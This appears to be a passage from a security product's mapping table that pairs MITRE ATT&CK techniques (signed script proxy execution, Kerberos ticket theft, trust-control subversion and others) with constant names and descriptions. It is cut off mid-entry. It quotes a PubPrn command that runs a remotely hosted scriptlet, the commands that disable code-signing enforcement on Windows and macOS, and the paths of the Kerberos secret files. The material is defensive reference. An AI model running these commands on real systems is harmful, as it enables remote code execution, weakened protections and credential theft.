T1216 XDM_CONST.MITRE_TECHNIQUE_SIGNED_SCRIPT_PROXY_EXECUTION Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several
Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other
files. This behavior may be abused by adversaries to execute malicious files that could bypass application
control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List) https://
attack.mitre.org/techniques/T1216
Original Mapped Description

T1216.001 XDM_CONST.MITRE_TECHNIQUE_SIGNED_SCRIPT_PROXY_EXECUTION_PUBPRN Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic]
(https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain
Services. The script is signed by Microsoft and is commonly executed through the [Windows Command
Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code
publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://
CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn) Adversaries may abuse PubPrn to execute
malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries
may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An
example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This
behavior may bypass signature validation restrictions and application control solutions that do not account
for abuse of this script. In later versions of Windows (10+), PubPrn.vbs has been updated to prevent
proxying execution from a remote site. This is done by limiting the protocol specified in the second
parameter to LDAP://, vice the script: moniker which could be used to reference remote code via
HTTP(S). https://attack.mitre.org/techniques/T1216/001

T1072 XDM_CONST.MITRE_TECHNIQUE_SOFTWARE_DEPLOYMENT_TOOLS Adversaries may gain access to and use third-party software suites installed within an enterprise network,
such as administration, monitoring, and deployment systems, to move laterally through the network. Third-
party applications and software deployment systems may be in use in the network environment for
administration purposes (e.g., SCCM, HBSS, Altiris, etc.). Access to a third-party network-wide or
enterprise-wide software system may enable an adversary to have remote code execution on all systems
that are connected to such a system. The access may be used to laterally move to other systems, gather
information, or cause a specific effect, such as wiping the hard drives on all endpoints. The permissions
required for this action vary by system configuration; local credentials may be sufficient with direct access
to the third-party system, or specific domain credentials may be required. However, the system may require
an administrative account to log in or to perform it's intended purpose. https://attack.mitre.org/techniques/
T1072

T1518 XDM_CONST.MITRE_TECHNIQUE_SOFTWARE_DISCOVERY Adversaries may attempt to get a listing of software and software versions that are installed on a system or
in a cloud environment. Adversaries may use the information from [Software Discovery](https://
attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including
whether or not the adversary fully infects the target and/or attempts specific actions. Adversaries may
attempt to enumerate software for a variety of reasons, such as figuring out what security measures are
present or if the compromised system has a version of software that is vulnerable to [Exploitation for
Privilege Escalation](https://attack.mitre.org/techniques/T1068). https://attack.mitre.org/techniques/T1518

T1518.001 XDM_CONST.MITRE_TECHNIQUE_SOFTWARE_DISCOVERY_SECURITY_SOFTWARE_DISCOVERY Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors
that are installed on a system or in a cloud environment. This may include things such as firewall rules and
anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/
techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not
the adversary fully infects the target and/or attempts specific actions. Example commands that can be used
to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with
[Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and
[Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more
specific to the type of software or security system the adversary is looking for. It is becoming more common
to see macOS malware perform checks for LittleSnitch and KnockKnock software. Adversaries may also
utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO
Evil in AWS) https://attack.mitre.org/techniques/T1518/001

T1608 XDM_CONST.MITRE_TECHNIQUE_STAGE_CAPABILITIES Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To
support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities]
(https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/
techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged
on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://
attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure]
(https://attack.mitre.org/techniques/T1584)). Capabilities can also be staged on web services, such as
GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020) Staging of capabilities can aid the
adversary in a number of initial access and post-compromise behaviors, including (but not limited to): *
Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/
T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher
2015)(Citation: ATT ScanBox) * Staging web resources for a link target to be used with spearphishing.
(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) *
Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer]
(https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020) * Installing a
previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric
Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/
techniques/T1071/001)).(Citation: DigiCert Install SSL Cert) https://attack.mitre.org/techniques/T1608

T1608.004 XDM_CONST.MITRE_TECHNIQUE_STAGE_CAPABILITIES_DRIVE_BY_TARGET Adversaries may prepare an operational environment to infect systems that visit a website over the normal
course of browsing. Endpoint systems may be compromised through browsing to adversary controlled
sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web
browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on
the site), but adversaries may also set up websites for non-exploitation behavior such as [Application
Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://
attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to
users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled
infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or
previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).
Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/
techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher
2015) This may be done in a number of ways, including inserting malicious script into web pages or other
user controllable web content such as forum posts. Adversaries may also craft malicious web
advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging
content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's
browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is
vulnerable prior to attempting exploitation.(Citation: ATT ScanBox) Websites compromised by an adversary
and used to stage a drive-by may be ones visited by a specific community, such as government, a
particular industry, or region, where the goal is to compromise a specific user or set of users based on a
shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole
attack. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting,
different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/
techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).
https://attack.mitre.org/techniques/T1608/004

T1608.003 XDM_CONST.MITRE_TECHNIQUE_STAGE_CAPABILITIES_INSTALL_DIGITAL_CERTIFICATE Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are
files that can be installed on servers to enable secure communications between systems. Digital certificates
include information about the key, information about its owner's identity, and the digital signature of an entity
that has verified the certificate's contents are correct. If the signature is valid, and the person examining the
certificate trusts the signer, then they know they can use that key to communicate securely with its owner.
Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable
encrypted communication with it.(Citation: DigiCert Install SSL Cert) Adversaries may install SSL/TLS
certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric
Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/
techniques/T1071/001)) or lending credibility to a credential harvesting site. Installation of digital certificates
may take place for a number of server types, including web servers and email servers. Adversaries can
obtain digital certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) or create
self-signed certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1587/003)). Digital
certificates can then be installed on adversary controlled infrastructure that may have been acquired
([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised
([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). https://attack.mitre.org/
techniques/T1608/003
Original Mapped Description

T1608.005 XDM_CONST.MITRE_TECHNIQUE_STAGE_CAPABILITIES_LINK_TARGET Adversaries may put in place resources that are referenced by a link that can be used during targeting. An
adversary may rely upon a user clicking a malicious link in order to divulge information (including
credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links
can be used for spearphishing, such as sending an email accompanied by social engineering text to coax
the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in
[Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a
system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set
up the resources for a link target for the spearphishing link. Typically, the resources for a link target will be
an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/
techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites
to serve as the link target, this can include cloning of login pages of legitimate web services or organization
login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/
techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407
September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001)
and have the link target point to malware for download/execution by the user. Adversaries may purchase
domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.)
during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help
facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also
be employed. https://attack.mitre.org/techniques/T1608/005

T1608.001 XDM_CONST.MITRE_TECHNIQUE_STAGE_CAPABILITIES_UPLOAD_MALWARE Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible
during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors,
and a variety of other malicious content. Adversaries may upload malware to support their operations, such
as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/
techniques/T1105) by placing it on an Internet accessible web server. Malware may be placed on
infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://
attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure]
(https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub
or Pastebin.(Citation: Volexity Ocean Lotus November 2020) Adversaries may upload backdoored files,
such as application binaries, virtual machine images, or container images, to third-party software stores or
repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may
directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/
T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users
mistakenly executing these files. https://attack.mitre.org/techniques/T1608/001

T1608.002 XDM_CONST.MITRE_TECHNIQUE_STAGE_CAPABILITIES_UPLOAD_TOOL Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible
during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious
purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex:
[PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their
operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://
attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. Tools may be placed
on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://
attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure]
(https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web
services, such as an adversary controlled GitHub repo. Adversaries can avoid the need to upload a tool by
having compromised victim machines download the tool directly from a third-party hosting location (ex: a
non-adversary controlled GitHub repo), including the original hosting site of the tool. https://attack.mitre.org/
techniques/T1608/002

T1528 XDM_CONST.MITRE_TECHNIQUE_STEAL_APPLICATION_ACCESS_TOKEN Adversaries can steal user application access tokens as a means of acquiring credentials to access remote
systems and resources. This can occur through social engineering and typically requires user action to
grant access. Application access tokens are used to make authorized API requests on behalf of a user and
are commonly used as a way to access resources in cloud-based applications and software-as-a-service
(SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is
one commonly implemented framework that issues tokens to users for access to systems. An application
desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety
of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant
flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code
Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with
resources containing user data in the ways requested by the application without obtaining user credentials.
Adversaries can leverage OAuth authorization by constructing a malicious application designed to be
granted access to resources with the target user's OAuth token. The adversary will need to complete
registration of their application with the authorization server, for example Microsoft Identity Platform using
Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation:
Microsoft - Azure AD App Registration - May 2019) Then, they can send a link through [Spearphishing Link]
(https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the
application. Once the OAuth access token is granted, the application can gain potentially long-term access
to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/
T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019) Adversaries have been seen
targeting Gmail, Microsoft Outlook, and Yahoo Mail users.(Citation: Amnesty OAuth Phishing Attacks,
August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) https://attack.mitre.org/techniques/T1528

T1539 XDM_CONST.MITRE_TECHNIQUE_STEAL_WEB_SESSION_COOKIE An adversary may steal web application or service session cookies and use them to gain access to web
applications or Internet services as an authenticated user without needing credentials. Web applications
and services often use session cookies as an authentication token after a user has authenticated to a
website. Cookies are often valid for an extended period of time, even if the web application is not actively
used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote
systems. Additionally, other applications on the targets machine might store sensitive authentication
cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to
bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie) There are several
examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky
TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source
frameworks such as Evilginx 2 and Muraena that can gather session cookies through a malicious proxy (ex:
[Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary
and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena) After an adversary
acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/
T1550/004) technique to login to the corresponding web application. https://attack.mitre.org/techniques/
T1539

T1558 XDM_CONST.MITRE_TECHNIQUE_STEAL_OR_FORGE_KERBEROS_TICKETS Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to
enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication
protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as
“realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation:
ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of
Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated.
The KDC is responsible for both authentication and ticket granting. Attackers may attempt to abuse
Kerberos by stealing tickets or forging tickets to enable unauthorized access. On Windows, the built-in
klist utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist) Linux
systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred
to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while
a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative
distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD
maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well
as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root
access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob
can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the
Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a
Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to
Unix)(Citation: Kekeo) Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux.
By default, access to these ccache entries is federated through the KCM daemon process via the Mach
RPC protocol, which uses the caller's environment to determine access. The storage location for these
ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment
variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can
interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native
Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to
use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.
(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT) https://
attack.mitre.org/techniques/T1558
Original Mapped Description

T1558.004 XDM_CONST.MITRE_TECHNIQUE_STEAL_OR_FORGE_KERBEROS_TICKETS_AS_REP_ROASTING Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by
[Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y
Roasting AS-REPs Jan 2017) Preauthentication offers protection against offline [Password Cracking]
(https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource
initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-
REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is
able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an
Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the
user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth
2014) For each account found without preauthentication, an adversary may send an AS-REQ message
without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted
with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline
[Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting]
(https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y
Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) An account
registered to a domain, with or without special privileges, can be abused to list all domain accounts that
have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/
techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for
each user. If the DC responds without errors, the account does not require preauthentication and the AS-
REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)
(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) Cracked hashes may enable [Persistence]
(https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and
[Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://
attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014) https://attack.mitre.org/
techniques/T1558/004

T1558.001 XDM_CONST.MITRE_TECHNIQUE_STEAL_OR_FORGE_KERBEROS_TICKETS_GOLDEN_TICKET Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets
(TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable
adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU
Golden Ticket Protection) Using a golden ticket, adversaries are then able to request ticket granting service
(TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with
the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)
The KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the
Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all
Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be
obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access
to a domain controller. https://attack.mitre.org/techniques/T1558/001

T1558.003 XDM_CONST.MITRE_TECHNIQUE_STEAL_OR_FORGE_KERBEROS_TICKETS_KERBEROASTING Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a
ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/
techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos
Dec 2015) Service principal names (SPNs) are used to uniquely identify each instance of a Windows
service. To enable authentication, Kerberos requires that SPNs be associated with at least one service
logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting
Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking
Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016) Adversaries possessing a valid Kerberos
ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets
for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation:
AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4
algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the
SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/
techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos
Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016) This
same attack could be executed using service tickets captured from network traffic.(Citation: AdSecurity
Cracking Kerberos Dec 2015) Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/
TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://
attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).
(Citation: SANS Attacking Kerberos Nov 2014) https://attack.mitre.org/techniques/T1558/003

T1558.002 XDM_CONST.MITRE_TECHNIQUE_STEAL_OR_FORGE_KERBEROS_TICKETS_SILVER_TICKET Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge
Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also
known as service tickets.(Citation: ADSecurity Silver Tickets) Silver tickets are more limited in scope in than
golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the
system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver
tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially
making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets) Password hashes for target
services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or
[Kerberoasting](https://attack.mitre.org/techniques/T1558/003). https://attack.mitre.org/techniques/
T1558/002

T1553 XDM_CONST.MITRE_TECHNIQUE_SUBVERT_TRUST_CONTROLS Adversaries may undermine security controls that will either warn users of untrusted activity or prevent
execution of untrusted programs. Operating systems and security products may contain mechanisms to
identify programs or websites as possessing some level of trust. Examples of such features would include a
program being allowed to run because it is signed by a valid code signing certificate, a program prompting
the user with a warning because it has an attribute set from being downloaded from the Internet, or getting
an indication that you are about to connect to an untrusted site. Adversaries may attempt to subvert these
trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to
subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/
techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting
these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal
code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation:
Symantec Digital Certificates) https://attack.mitre.org/techniques/T1553

T1553.002 XDM_CONST.MITRE_TECHNIQUE_SUBVERT_TRUST_CONTROLS_CODE_SIGNING Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code
signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has
not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may
be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation:
Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/
T1036/001), this activity will result in a valid signature. Code signing to verify software on first run can be
used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized
nature of the platform. (Citation: Wikipedia Code Signing) Code signing certificates may be used to bypass
security policies that require signed code to execute on a system. https://attack.mitre.org/techniques/
T1553/002
Original Mapped Description

T1553.006 XDM_CONST.MITRE_TECHNIQUE_SUBVERT_TRUST_CONTROLS_CODE_SIGNING_POLICY_MODIFICATION Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code
signing provides a level of authenticity on a program from a developer and a guarantee that the program
has not been tampered with. Security controls can include enforcement mechanisms to ensure that only
valid, signed code can be run on an operating system. Some of these security controls may be enabled by
default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on
macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be
disabled by default but are configurable through application controls, such as only allowing signed
Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify
default signature enforcement policies during the development and testing of applications, disabling of
these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)
(Citation: Apple Disable SIP) Adversaries may modify code signing policies in a number of ways, including
through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112),
rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.
(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit
Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing
policy of a system include bcdedit.exe -set TESTSIGNING ON on Windows and csrutil disable on
macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the
implementation, successful modification of a signing policy may require reboot of the compromised system.
Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the
corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.
(Citation: F-Secure BlackEnergy 2014) To gain access to kernel memory to modify variables related to
signature checks, such as modifying g_CiOptions to disable Driver Signature Enforcement, adversaries
may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a
signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)
https://attack.mitre.org/techniques/T1553/006

T1553.001 XDM_CONST.MITRE_TECHNIQUE_SUBVERT_TRUST_CONTROLS_GATEKEEPER_BYPASS Adversaries may modify file attributes that signify programs are from untrusted sources to subvert
